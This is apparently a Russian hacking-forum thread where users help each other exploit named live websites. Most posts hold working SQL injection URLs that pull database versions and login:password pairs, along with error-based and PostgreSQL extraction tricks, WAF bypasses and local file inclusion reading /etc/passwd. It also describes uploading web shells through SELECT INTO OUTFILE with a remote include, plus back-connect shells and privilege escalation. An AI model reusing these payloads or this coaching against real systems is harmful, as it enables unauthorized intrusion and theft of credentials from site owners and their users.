Подскажите плиз.
Есть скуля на сайте где стоит форум IPB, допустим в бажном скрипте такой запрос

SELECT * FROM news WHERE id='$_GET[id]'

могу ли так сделать

SELECT * FR0M news WHERE id='1' + UNION + INSERT into members (bla,bla,...) VALUES (bla,bla,...);

т.е. вместо UNION SELECT написать другое например UNION INSERT или UNION DELETE , или с помощью UNION можно только SELECT юзать?


только select

только select
спс, ясн, я так понял это зависит от левой части запроса.
т.е. если бы был запрос таким UPDATE SET bla bla WHERE bla=$_GET[bla] то тогда можно бы было обновить БД
так UPDATE SET bla bla WHERE bla=$_GET[bla]+UNION UPDATE set admin_pass=admin

я правильно понял?

п.с. я помню ты скинул давно был мне скрипт для залития аплоадера через /proc/self/environ я бы был искренее благодарен если бы ты его выложил ещё раз плиз

спс, ясн, я так понял это зависит от левой части запроса.
т.е. если бы был запрос таким UPDATE SET bla bla WHERE bla=$_GET[bla] то тогда можно бы было обновить БД
так UPDATE SET bla bla WHERE bla=$_GET[bla]+UNION UPDATE set admin_pass=admin

я правильно понял?

п.с. я помню ты скинул давно был мне скрипт для залития аплоадера через /proc/self/environ я бы был искренее благодарен если бы ты его выложил ещё раз плиз


Да, но насчет union update точно не уверен, возможна ли такая конструкция - мельком глянул мануал об этом не написано.

ps про аплоадер в личку отписал

Да, но насчет union update точно не уверен, возможна ли такая конструкция - мельком глянул мануал об этом не написано.

ps про аплоадер в личку отписал
спасибо, поставте +5 человеку. т.к. у меня нет возможости

UNION используется для обьединения вывода двух или более запросов SELECT.

Есть винрарная статья 1dt.w0lf'a: http://www.inattack.ru/article/220.html
Кое-что процитирую:

Итак, команда UNION используется для обьединения вывода двух или более запросов SELECT.
Особенности команды которые придется учитывать:
Когда два (или более) запроса подвергаются объединению, их столбцы вывода должны
быть совместимы для объединения. Это означает, что каждый запрос должен
указывать одинаковое количество столбцов и в том же порядке и каждый должен
иметь тип, совместимый с каждым.
Также данная возможность появилать только в mysql версии 4.0 т.е. на более
ранних версиях БД работать не будет.
Вид команды таков:
SELECT a1, a2, a3 FROM table1 UNION SELECT b1, b2, b3 FROM table2;
Где a1 и b1, a2 и b2, a3 и b3 должны быть одинакового типа.
Например:
SELECT text11, text12, int11 FROM t1 UNION SELECT text21, text22, int22 FROM t2;

http://www.mysql.ru/docs/man/UNION.html

лучше конечно от производителя почитать маны, но они ведь на буржуйском :D

Подобрал колво стоблбцов http://wwwsdfsdfsdfsd.e-amwsfsdfsdfsdfay.ru/index.php?id=3)+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+

но вывод так не получесться
http://www.e-sfsdfsdfsdfamway.ru/index.php?id=-3)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25+--+

в чём трабла? помогите плиз

http://www.e-amway.ru/index.php?id=3)+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22 ,23,24,25--+

SQL: SELECT fullname FROM `b10780_eamway`.etomite_user_attributes WHERE `b10780_eamway`.etomite_user_attributes.id = 5.0.67

Подскажите пожалуйста есть шелл!Права uid=33(www-data) gid=33(www-data).safe mode-off!Не подскажите как можно пройти выше по каталогам?стоит Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 PHP/5.2.6-3ubuntu4.5?токо не судите строго!читал что можно как то открыть порт.и потом к нему присоедениться!

https://forum.antichat.net/thread148119.html

Подскажите пожалуйста есть шелл!Права uid=33(www-data) gid=33(www-data).safe mode-off!Не подскажите как можно пройти выше по каталогам?стоит Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 PHP/5.2.6-3ubuntu4.5?токо не судите строго!читал что можно как то открыть порт.и потом к нему присоедениться!
полезно знать команды никсовые.

например вот такие ls -la и cp при удачном стечении обстоятельств можно скопировать с одного места шел в другое. (те в тут да где есть доступ из веб и имеются права на запись.)
ps ето если те нужно попасть на другой сайт на томже серве но он находится в другой дире.

Здравствуйте.
На сайте есть изменение цвета скина. "Переменная" берется через куки. Т.е. color: green стоит. Если же поставить color: "><script>alert()</script>, то прекрасно срабатывает.
Есть возможность через другой локальный сайт установить для домена сайта, на котором есть уязвимость, куки с xss (или css, точно не знаю).
Возможно ли как-нибудь использовать данную уязвимость, чтобы украсть куки или что-либо другое помимо простого алерта?

а есть online converter для изменения char => hex ??

а есть online converter для изменения char => hex ??

Например, вот (http://home2.paulschou.net/tools/xlate/) .

http://x3k.ru/

а моjно заливать shell из phpmyadmin-a ??

а моjно заливать shell из phpmyadmin-a ??


SELECT '<? @include("http://www.site.com/shell.txt"); ?>' into outfile '/абсолютный путь/shel.php';

я знаю ету ну не нащел полнуы путь..и поетому из пхпмядмина хо4у заливат shell//

я знаю ету ну не нащел полнуы путь..и поетому из пхпмядмина хо4у заливат shell//

по любому что бы залить шелл тебе нужен полный путь, в пхпмаядмине тоже через базу заливать надо...так что без путей никуда

ok spasibo..

2 LokbatanLi смотри пути в пхпинфо
site.com/phpmyadmin/phpinfo.php
site.com/phpmyadmin/info.php

http://www.mymac.ru/forum_heritage/showthreaded.php?Cat=-1%20union%20select%201%202%203%204%205%20--

Вот здесь скуля ,а понять ни чего не могу . Кажется ,видно
SQL ERROR: Unable to do_query: REPLACE INTO w3t_Online (O_Username,O_Last,O_What) VALUES ('-ANON-95.190.179.255','1265722842','showthreaded')

а что и как незнаю.
Дайте совет.

:confused: Спасибо .

а в чем разница между твоей ссылкой и этими двумя?


http://www.mymac.ru/forum_heritage/showthreaded.php?Cat=1
http://www.mymac.ru/forum_heritage/

http://www.mymac.ru/forum_heritage/showthreaded.php?Cat=-1%20union%20select%201%202%203%204%205%20--

Вот здесь скуля ,а понять ни чего не могу . Кажется ,видно
SQL ERROR: Unable to do_query: REPLACE INTO w3t_Online (O_Username,O_Last,O_What) VALUES ('-ANON-95.190.179.255','1265722842','showthreaded')

а что и как незнаю.
Дайте совет.

:confused: Спасибо .

Нашлась другая скуля:

http://mymac.ru/forum/showflat.php?Cat=&Board=free_news&Number=-1+union+select+1,2,3,unhex(hex(version()))/*

Вывод - в заголовке.

http://krasn.int.ru/a-t_presents_category_hphp/login-hisotex/cat-1499999+union+select+1,2,3,version(),5+--+/

версию добыл, но при обращении к инфорсхема еррор, как можно обойти?

2 udmanhttp://krasn.int.ru/a-t_presents_category_hphp/login-hisotex/cat-1499999+union+select+1,2,3,table_name,5+from+infor mation_schema%252etables+--+

как работать с параметром сепаратор в mysql inj ?? в какоy ситуацие нуjeн ?

Столкнулся с проблемой: nmap 5 не сканирует внешние ипы, только моей сети, в то время как xSpider 7.5 справляется на ура. В чём трабл?

есть шелл, на сервере включен сейф.. возможно как-то запустить бэк-коннект? disable_functions No value. хочу порутать,ядро 2007 года..

а как пробовал запускать уже?

а как пробовал запускать уже?

perl back.pl [ip] 53

а ты попробуй через бинарник сишный, баш, другой порт, бекконект встроенный в WSO2 тот же - отличная вещь, как практика показывает

PS: Порт повыше бери

Если включен сейф-мод, то надо обходить, запуском бинарного бека вместо перлового - не обойдешь СМ.

Можно ли выполнить комманду если:

Disable functions : symlink, dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit, imap_open, imap_body,imap_list, imap_createmailbox, imap_deletemailbox, imap_renamemailbox, mb_send_mail

http://www.pogoda.ua/index.php?id=6209+and+1=0+union+select+0,1,2,3,4--
там скуль четвертой версии...я пробрутил названия таблиц..толку мало...можно ли че-нить сделать ?!

http://www.pogoda.ua/index.php?id=6209+and+1=0+union+select+0,1,2,3,4--
там скуль четвертой версии...я пробрутил названия таблиц..толку мало...можно ли че-нить сделать ?!

Вполне себе существует таблица users с полями login и password:

http://www.pogoda.ua/index.php?id=-1+union+select+0,concat_ws(0x3a,login,password),2, 3,4+from+users--

Уж к чему-то, но они подходят.

Кроме того, прокатывает запрос вида:
http://www.pogoda.ua/index.php?id=-1+union+select+0,'1',2,3,4--

Подозреваю, что разрешены кавычки, но не уверен - попробовал прочитать файл через load_file(), - не вышло. Думаю, из-за того что файловых прав нет.

2.6.25 есть эксплоит?

http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz

Извините за глупость... Помогите скомпилить сплойт,желательно под винду, но и линухом не побрезгую. Ну не знаю я си (

http://milw0rm.com/exploits/98


Заранее благодарен.

http://www.pogoda.ua/admin/login.php может поможет

хеш странный

Не знаю, у меня его замечательно расшифровал passcracking.ru . Проблема в том, что этот логин\пароль к админке не подошёл. Нужно дальше таблицы брутить.

прошу помощи есть полный доступ к бд сайта
каким тыком залить на сайт шелл через mysql?
select '<? @include("http://moysite.ru/shell.php"); ?>' into outfile 'сервак стоит на винде'
после заливки открывает пустую страницу
<?php system($cmd) ?> тоже непомог

<?phpinfo();?> для начала попробуй залить, заодно увидишь, разрешен ли allow_url_include, allow_url_fopen и system, и еще много чего инетересного увидишь

Моя очередь вам мозг убить
Есть скуля - MSSQL
тама идёт запрос SELECT * FROM table WHERE id = #id#
id=1 OR 1=@@version = SQL Server 2000
Тоесть есть вывод через ошибки, обычный вывод - геморой, тута страницы 2 надо чоб описать всё, поэтому вопрос про вывод через ошибки
Я знаю структуру БД, такчто таблы мне искать ненад
Мне надо выбить инфу из таблы, вот токо на сайте фильтруются символы
%()[]
Чё делать :o
P.S. Про обычный вывод - UNION SELECT... тама 69 поля, и если типы не совпадают - выбивает ошибку, а как я могу узнать в каком поле не совпадают типы =\
И всёже - чё делать с ошибкой
The text, ntext, or image data type cannot be selected as DISTINCT.
гугл говорит заюзать чётотам(varchar(9000)) но скобки запрещены, немогу :(

если скобки запрещены - ничего не сделать, вроде бы, инвертировать не получится

PS: но это если скобки действительно запрещены, а так convert(куда_конверт,system_user)

P.S. Про обычный вывод - UNION SELECT... тама 69 поля, и если типы не совпадают - выбивает ошибку, а как я могу узнать в каком поле не совпадают типы =\
сначала указываешь для всех полей null, потом последовательно подставляешь строки и смотришь в каком по счету поле не будет ошибки.
И всёже - чё делать с ошибкой
Цитата:
The text, ntext, or image data type cannot be selected as DISTINCT.
UNION ALL SELECT

Pashkela, скобки точно запрещены
']сначала указываешь для всех полей null, потом последовательно подставляешь строки и смотришь в каком по счету поле не будет ошибки.

Указывал все нуллы, всёравно говорит
The text, ntext, or image data type cannot be selected as DISTINCT.
даже указывал
-1 UNION SELECT * FROM %табла, которая используется в запросе%
Опять гвоорит этуже ошибку
В мелкософте какраз такой случай разбирается, но тама скобки нужны
']UNION ALL SELECT
А вот это непонял куда
1 UNION ALL SELECT = Incorrect syntax near 'SELECT'

правильно, а теперь совмести то, что я сказал про null'ы и ALL SELECT
1 UNION ALL SELECT null,null,null...

Хмммм... хз как, но оно кажись получается, токо надо теперь поля под типы подобрать, цёма
Эммм... А как лимит заюзать
LIMIT 0,1 говорит Incorrect syntax near '0'
я знаю, чо надо юзать NOT IN() но нужны скобки :(
чё делать
=====
всё, нащёл - ... WHERE column!='value'

Если нужно вытянуть всю базу..
column>'x'
И ставишь на цикл, каждый раз меняя значение x на новое, вообщем всё просто.

есть сайт site.ru/page.php?id=1. Не могу догнать: когда я подставляю id=1 and 1=2 у меня открывается страница, как для id=1. Как это получается?

есть сайт site.ru/page.php?id=1. Не могу догнать: когда я подставляю id=1 and 1=2 у меня открывается страница, как для id=1. Как это получается?

Значит нету там иньекции просто. Фильтруется просто скорее всего. Кавычку ты ставил? Складывал\вычитал значения?

Значит нету там иньекции просто.
Значит там не из базы берет?? или нету инъекции? а если нет инъекции, то какой запрос тогда получается?

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/u14171/mpomed.ru/www/id1/index.php on line 39
Скажите вот после того как поставил знак ' , появляется такая ошибка. Что это значит?

CyberHunter, это значит что тебе пора читать статьи, а не постить сюда вопросы которые были заданы овер 9000 раз

Скажите вот после того как поставил знак ' , появляется такая ошибка. Что это значит?

Вопрос №1 Что это? (ну и далее линк , обычно с кавычкой на конце, пройдя по которому можно лицезреть ту или иную ошибку)
Этот вопрос порядком поднадоел и впринципе некорректен, но задаётся с завидной регулярностью

Если выводится ошибка, и в ней присутствует что то по базу/sql/mysql/mssql/PostgreSQL и т.д. или вываливается запрос, или функции вывода из базы, то это ошибка БД, и скорее всего будет возможность провести инъекцию.
НО. Инъекция , это внедрение своего кода в запрос и иногда как раз внедрить его не получится, несмотря на ошибку базы. Как нам это определить. Вот некоторые примеры, которые я надеюсь помогут, и избавят от этого вопроса
site.com/index.php?id=1
Выводит страницу 1
site.com/index.php?id=2-1(Выводит страницу 1)
site.com/index.php?id=2(Выводит страницу 2)
-------------------
site.com/index.php?id=1*1(Выводит страницу 1)
site.com/index.php?id=1*2(Выводит страницу 2)
-------------------
site.com/index.php?id=1+and+1=1(Выводит страницу 1)
site.com/index.php?id=1+and+1=2(Выводит ошибку, или ничего не выводит, вобщем отличается от первого)
-------------------
Если эти примеры работают, то мы имеем SQL инъекцию.

Во так. Я посмотрел сайт, да, там есть иньекция, почитай закреплённые темы

И кстати либо норм линк кидай, либо удаляй имя сайта из пути

http://www.mpomed.ru/id1/?idI=100500+union+select+1,username,3,4,password,6 ,7+from+admin

есть такоы вопрос..

есть один wаp саыт..у нево есть ммс сервис..и от туда мойно заqрузить фото и я заярузил шелл..

знаю то4но шелл в базе ну не мояу наыти линк..посмoтру своытсву шелл-а там есть линк друяово саыта..

4то зделат ??

чо?

Скажите вот после того как поставил знак ' , появляется такая ошибка. Что это значит?

http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7+--

есть такоы вопрос..

есть один wаp саыт..у нево есть ммс сервис..и от туда мойно заqрузить фото и я заярузил шелл..

знаю то4но шелл в базе ну не мояу наыти линк..посмoтру своытсву шелл-а там есть линк друяово саыта..

4то зделат ??

Если я тебя правильно понял, то тебе нужно найти папку в которой хранятся изображения (вместо одного из которых ты загрузил шелл).

Если я тебя правильно понял, то тебе нужно найти папку в которой хранятся изображения (вместо одного из которых ты загрузил шелл).

Для начала неплохо бы найти инклуд, если расширение как у картинки

Для начала неплохо бы найти инклуд, если расширение как у картинки

Я предположил, что он уже загрузил готовый шелл (*.php) и просто не может найти, куда именно (т.е., как к нему обратиться после загрузки). Он ведь написал - "точно знаю, что шелл в базе".

Фильтруется просто скорее всего. Кавычку ты ставил? Складывал\вычитал значения?
Ну да, складывал и вычитал, и ордэром проверял. Но дело в том что когда я у себя проверял(ну у меня смотрит строка или число, а если там запрос к приверу id=1 and 1=2, то он отправляет как строку), то у меня тоже открывается та же страница.
nerezus назвал мой метод "Самый говнокодистый говнокод в этой теме."


function secure($par) {
$numb = array("1","2","3","4","5","6","7","8","9","0","-");
if( get_magic_quotes_gpc())
{
$link = stripslashes($par);
}
$l=$par+1-1;
if ((string)$l==(string)$par) {

$par=(string)$par;
$new_par="";
for ($i=0;$i<>strlen($par);$i++) {
if (in_array($par{$i},$numb)) {
$new_par=$new_par.$par{$i};
}
if ($new_par<"-2147483648" || $new_par>"2147483647") $new_par="1";
$new_par=(int)$new_par;
}
}
else
{
$new_par=mysql_real_escape_string($par);
}
return $new_par;
}

по етому разобраться надо

Я предположил, что он уже загрузил готовый шелл (*.php) и просто не может найти, куда именно (т.е., как к нему обратиться после загрузки). Он ведь написал - "точно знаю, что шелл в базе".

да да то4но заяруяется ну не знаю куда ..??

http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7+--
wildshaman скажи почему при вводе твоего запроса, появляется тоже самое, что и
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4 -- ?
З.Ы. Подскажите мб есть какая-то статья, в которой есть основные команды в языке sql.

CyberHunter

при запросе
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7+--
Выводится тек.юзер, версия БД и имя бд.

а при запросе:
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4 --
выводится принтабельное поле, точнее при это запросе ничего не выводится,т.к. не правильно подобраны столбцы. Добавь еще .....5,6,7--

П.С, вот хорошая статья: http://forum.antichat.ru/thread104591.html

http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7+--
wildshaman скажи почему при вводе твоего запроса, появляется тоже самое, что и
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4 -- ?


Почему то же самое?
З.Ы. Подскажите мб есть какая-то статья, в которой есть основные команды в языке sql.
http://www.mysql.ru/docs/mysql-man-5.0-en/sql-syntax.html#select

Вот что-то неочень могу разобраться с этой скулей http://vip-study.by/index.php?id=-1+union+select+1,2,3,4,5,concat(username,0x3a,pass word),7,8,9,10,11,12,13,14,15,16+from+users--

пароль расшифровали только, когда ввожу его в админку не заходит

jecka3000 спс!
Еще хотел бы спросить при вводе команд типа union select, нужно ставить знак + между ними?
И еще, вот допустим нашел я столбцы и т.д. и если хочу увидеть имя БД, то вместо одного номера нужно ввести нужную команду?

Вот что-то неочень могу разобраться с этой скулей http://vip-study.by/index.php?id=-1+union+select+1,2,3,4,5,concat(username,0x3a,pass word),7,8,9,10,11,12,13,14,15,16+from+users--

пароль расшифровали только, когда ввожу его в админку не заходит
Значит пароль не от админки, либо расшифрован неправильно.

jecka3000 спс!
Еще хотел бы спросить при вводе команд типа union select, нужно ставить знак + между ними?
+ в URL-кодировке - пробел.
]И еще, вот допустим нашел я столбцы и т.д. и если хочу увидеть имя БД, то вместо одного номера нужно ввести нужную команду? Не понял...

Сообщение от CyberHunter
]И еще, вот допустим нашел я столбцы и т.д. и если хочу увидеть имя БД, то вместо одного номера нужно ввести нужную команду?

нужно вместо принтабельного столбца ввести слово database()

Всем привет, как можно узнать версию джумлы?

SeNaP, тебе сюда:

http://forum.antichat.ru/thread106899.html

+ в URL-кодировке - пробел.
можно еще 0x0a, 0x0c, 0x0b, 0x09 или любой символ неиспользуемый мускулом.
]И еще, вот допустим нашел я столбцы и т.д. и если хочу увидеть имя БД, то вместо одного номера нужно ввести нужную команду?
если версия => 5 то смотри в schema_name из таблицы schemata
UPD: немного неправильно понял, вообщем таким образом можно узнать полный список баз )

у меня невыйшло проинклудить,может кто круче шарит и сможет расскрутить багу?

http://www.e-quilibres.net/pages/page.php?rub=gen&p=/tmp/sess_5ulcekq6qo696vjsi4jn71ut57

у меня невыйшло проинклудить,может кто круче шарит и сможет расскрутить багу?

http://www.e-quilibres.net/pages/page.php?rub=gen&p=/tmp/sess_5ulcekq6qo696vjsi4jn71ut57

http://www.e-quilibres.net/pages/page.php?rub=gen&p=/etc/passwd

root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/log: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/: news:x:9:13:news:/usr/lib/news: uucp:x:10:14:uucp:/var/spool/uucppublic: operator:x:11:0:operator:/root:/bin/bash games:x:12:100:games:/usr/games: ftp:x:14:50::/home/ftp: smmsp:x:25:25:smmsp:/var/spool/clientmqueue: mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/: gdm:x:42:42:GDM:/var/state/gdm:/bin/bash pop:x:90:90:POP:/: nobody:x:99:99:nobody:/:

Вот помогите мне разобраться:
http://www.sukhoi.org/news/company/?id=3142
Как я понял, здесь отключены ошибки т.к. при вводе знак " ' ", не было ошибки.
Как можно здесь раскрутить скулю? Я пробивал перед "3142" ставить " - ", тогда страница изменилась.
Подскажите, что делать с этим сайтом?

у меня невыйшло проинклудить,может кто круче шарит и сможет расскрутить багу?

http://www.e-quilibres.net/pages/page.php?rub=gen&p=/tmp/sess_5ulcekq6qo696vjsi4jn71ut57


http://www.e-quilibres.net/pages/page.php?rub=gen&p=../adm/.htaccess&Id=185

http://www.e-quilibres.net/pages/page.php?rub=gen&p=/web/sites/vhbu/8/30/74216/public/www/.siteadmin&Id=185

http://www.e-quilibres.net/adm/

/web/sites/vhbu/8/30/74216/public/www/

Помогите раскрутить

http://www.bre3zah.com/youtubes/admintest/videos/managevideos.php?x=20'

варнинги сыпет, но подобрать поля или обрезать запрос не получается...

http://www.pinskdrev.by/catalog.php?sub_id=6+union+select+1,2,3,4,5,6,7,8, 9,10,11+--+
Объяснит мне кто-нибудь, что делать когда есть два запроса в скрипте?

http://www.pinskdrev.by/catalog.php?sub_id=6+union+select+1,2,3,4,5,6,7,8, 9,10,11+--+
Объяснит мне кто-нибудь, что делать когда есть два запроса в скрипте?


http://www.pinskdrev.by/catalog.php?sub_id=6+and+substring(version(),1,1)= 5

http://www.pinskdrev.by/catalog.php?sub_id=(SELECT+*+FROM(SELECT+*+FROM(SE LECT+NAME_CONST((version()),14)d)+as+t+JOIN+(SELEC T+NAME_CONST((version()),14)e)b)a)


5.0.32-Debian_7etch5-log

http://www.pinskdrev.by/catalog.php?sub_id=6+union+select+1,2,3,4,5,6,7,8, 9,10,11+--+
Объяснит мне кто-нибудь, что делать когда есть два запроса в скрипте?
Blind
http://www.pinskdrev.by/catalog.php?sub_id=6+and+substring(version(),1,1)= 5

PS: Забыл о выводе через name_const :)

2 auth_root
там, походу, инъекция после лимита, да еще и с ордер баем, а при таком сочетании, насколько мне известно, инъекцию провести невозможно :(

PostgreSQL 8.3.7
-------------------------------------
Подскажите с конструкцией типа:
select+column_name::text::boolean+from+information _schema.columns--
в ответ
неверный входной синтаксис для типа boolean: "typname"
select+column_name::text::boolean+from+information _schema.columns+where+column_name+not+in($$typname $$)----
неверный входной синтаксис для типа boolean: "typnamespace"
Я так понимаю typename и typenamespace - это названия колонок. Но как дальше перебирать конструкцией not in?

При проверке же
select+usesuper+from+pg_user+where+usename=($$curr ent_user$$)----
в ответ страница без ошибок и нужной мне информации
если
select+usesuper+from+pg_user+where+usename=current _user----
то
Bad column offset specified
ошибка синтаксиса в конце ввода LINE 1: SELECT * FROM sdesc WHERE idservice= ^ in


select+column_name::text::boolean+from+information _schema.columns+limit+1+offset+0--
неверный входной синтаксис для типа boolean: "tmplname"
в этой же конструкции ни лимит ни оффсет ничего не меняет.

Но как дальше перебирать конструкцией not in?

Так и перебирать

not+in($$typname$$,$$typnamespace$$,$$other_column $$)

и т.д. А чем LIMIT ... OFFSET ... не нравится для перебора таблиц?

Так и перебирать
Спасибо, уже хоть что-то заработало :)
и т.д. А чем LIMIT ... OFFSET ... не нравится для перебора таблиц?

select+column_name::text::boolean+from+information _schema.columns+limit+1+offset+0--
Цитата:
неверный входной синтаксис для типа boolean: "tmplname"
Изменение же LIMIT ... OFFSET на вывод не влияет, как выдал он tmplname, так его и выдает

лимит менять не стоит, изменяется оффсет. Если по какой-то причине не удается получить инфу из pg_user, то попробуйте выяснить о статусе поля usesuper косвенно, например, обратившись к pg_shadow / pg_authid. Также не исключено отсутствие прав на pg_user, следовательно, usesuper = false

Added. Проверил сейчас в консоли. Запросы

select column_name::text::boolean from information_schema.columns order by 1 limit 1 offset 2;
select column_name::text::boolean from information_schema.columns order by 1 limit 1 offset 3;
select column_name::text::boolean from information_schema.columns order by 1 limit 1 offset 1000;

выдает один и тот же результат

это-то понятно, select+column_name::text::boolean+from+information _schema.columns+limit+1+offset+22----
неверный входной синтаксис для типа boolean: "tmplname"
ничего в выводе не меняется

к pg_shadow нет доступа

так, попробуйте по-другому запрос составить

select column_name::text::boolean from (select column_name from information_schema.columns limit 1 offset 2)q;

Помогите разобраться(если кому не лень с объяснениями) :
http://www.sukhoi.org/news/company/?id=3142

Заранее спс!

Помогите разобраться(если кому не лень с объяснениями) :


Заранее спс!
Направляете мышкой на ссылку, зажимаете левую кнопку и тянете пока не выделиться вся ссылка. Потом, нажимаете пальцами на клавиатуре сочитание клавиш, сначала "ctrl", потом не отпуская "ctrl" (понимаю это трудно, но что делать) нажимаете кнопочку "c" и в адресной строке браузера нажимаете "ctrl"+"v", далее жмякаете enter и вуаля вы внутри сайта. Если что непонятно, пишите в пм, объясню подробно.
зы. Надеюсь помог.

Направляете мышкой на ссылку, зажимаете левую кнопку и тянете пока не выделиться вся ссылка. Потом, нажимаете пальцами на клавиатуре сочитание клавиш, сначала "ctrl", потом не отпуская "ctrl" (понимаю это трудно, но что делать) нажимаете кнопочку "c" и в адресной строке браузера нажимаете "ctrl"+"v", далее жмякаете enter и вуаля вы внутри сайта. Если что непонятно, пишите в пм, объясню подробно.
зы. Надеюсь помог.
Очень смешно...

Если не трудно помогите раскрутить.

там int или intval скорее всего, просто нет проверки на "-", то бишь вряд ли там (конкретно по этой ссылке) есть скуля

http://www.bombardier.cv.ua/boat2.php?id_boat2=68+union+select+0

а 4то зделать в таком ситуации ??

http://www.bombardier.cv.ua/boat2.php?id_boat2=(select*from(select+name_const( version(),1),name_const(version(),1))a)

http://www.krutomer.ru/city/134/20'

вроде еррор есть но дальше ничего... что можно придумать?

вроде еррор есть но дальше ничего... что можно придумать?
Где "еррор"? Отображается до кавычки и после одинаково.

Подскажите с конструкцией типа:
select%20login::text::boolean%20from%20(select%20l ogin%20from%20logins%20limit%201%20offset+1)q;----
выдает логин
select%20passwd::text::boolean||chr(58)||login::te xt::boolean%20from%20(select%20passwd,login%20from %20logins%20limit%201%20offset+1)q;----
неверный входной синтаксис для типа boolean: "$1$rTat6wug$Qvx2HyTZNNKWYJnmszCP31" in /usr/ и т.д
т.е выдает только пароль
----------------
Как вывести информацию в виде login:passwd?

И подскажите скрипт для перебора limit offset с аутентификацией и работой с https? если таковой имеется

CyberHunter
Warning: Invalid argument supplied for foreach() in /usr/home/krutomer/krutomer.ru/html/city.php on line 301

в опере отображается а вот в мозилле нет )

Помогите разобраться(если кому не лень с объяснениями) :


Заранее спс!


разобраться в чем? в конструкции нового самолета компании?

samarin
Изменение же LIMIT ... OFFSET на вывод не влияет, как выдал он tmplname, так его и выдает
Пробуй с подзапросами, тогда лимит должен работать
select (select table_name from information_schema.tables limit 1 offset 1)::text::boolean

http://www.bombardier.cv.ua/boat2.php?id_boat2=(select*from(select+name_const( version(),1),name_const(version(),1))a)


о4ень спасибо ну моjэт подробнее ??

a vot zdes ??

http://www.aspik.am/index.php?p=-5+union+select+1

Как вывести информацию в виде login:passwd?

Например, так

select (login||chr(58)||passwd)::text::boolean from (select passwd,login from logins limit 1 offset 1)q;----

или так

select a::text::boolean from (select (login||chr(58)||passwd) as a from logins limit 1 offset 1)q;----

krypt3r
Спасибо! Вы как всегда на высоте :)
Spyder
Пробуй с подзапросами, тогда лимит должен работать
select (select table_name from information_schema.tables limit 1 offset 1)::text::boolean
Тоже спасибо! Это мы уже с krypt3r-ом разобрали.

Вот бы скриптик, для автоматического перебора оффсета, с авторизацией и https и я бы от всех отстал (можетбыть...) :)

И подкиньте сайтик, может у кого завалялся, с доступом к usesuper для образовательных целей

Помогите здесь скулю раскрутить:
http://zub.by/menu.php?form_id=1
Ввожу количество полей и всегда ошибка.

http://zub.by/menu.php?form_id=(select*from(select+name_const(ve rsion(),1),name_const(version(),1))a)

Pashkela У меня ошибка при таком вводе :(
А зависит ли это от браузера?

Правильно, ошибка, ты ошибку-то почитай
(5.0.51a-24)

PS: От версии браузера не зависит


http://zub.by/menu.php?form_id=(select*from(select+name_const((s elect+table_name+from+information_schema.tables+li mit+0,1),1),name_const((select+table_name+from+inf ormation_schema.tables+limit+0,1),1))a)


http://zub.by/menu.php?form_id=(select*from(select+name_const((s elect+table_name+from+information_schema.tables+li mit+1,1),1),name_const((select+table_name+from+inf ormation_schema.tables+limit+1,1),1))a)

.....

Правильно, ошибка, ты ошибку-то почитай
(5.0.51a-24)

PS: От версии браузера не зависит

У меня ничего подобного, вот смотри, что у меня:

# select parent_id, IF(id in (select menu_id from pl_user_settings),1,0) as access from pl_menu_menu where id = (select*from(select name_const(ve rsion(),1),name_const(version(),1))a)
# You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rsion(),1),name_const(version(),1))a)' at line 2

У меня ничего подобного, вот смотри, что у меня:

э, мен, ссылку когда отсюда копируешь, пробелы убирай, тут они специально расставляются, от таких как ты :D

Сам подумай, откуда в url могут быть ПРОБЕЛЫ

э, мен, ссылку когда отсюда копируешь, пробелы убирай, тут они специально расставляются, от таких как ты

Сам подумай, откуда в url могут быть ПРОБЕЛЫ
:) Об этом и хотел спросить :)

a vot zdes ??

http://www.aspik.am/index.php?p=-5+union+select+1

a vot zdes ??

http://www.aspik.am/index.php?p=-5+union+select+1
WAF не дремлет...http://www.aspik.am/index.php?p=-5+union+/*!select*/+concat_ws(0x3a,version(),database(),user())

что делать есле information_schema идет но выдает ошибку есле добовляю "limit+... иле group_concat?
есть способы обхода этой ошибки иле можно заменить limit както?

']что делать есле information_schema идет но выдает ошибку есле добовляю "limit+... иле group_concat?
есть способы обхода этой ошибки иле можно заменить limit както?
LIMIT можно:
WHERE field_name NOT IN (a, b, c ,d)
group_concat - хз...

Пацаны, хелп, плиз )))
http://www.site.com/script.asp?id=1'+or+1=@@version--
Выдает:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=1' or 1=@@version--'.

/script.asp, line 17
Что за нах**?

Access не держит комментарии.

Т.е. нифига не получится?

Т.е екстрасенсы в отпуске
Я написал то, что вижу, исходя из того, что ты дал

Или иди статью читай, или линк давай

http://www.mlsp.government.bg/showimage.asp?id=1'+or+1=@@version--
Скромно, да? =))

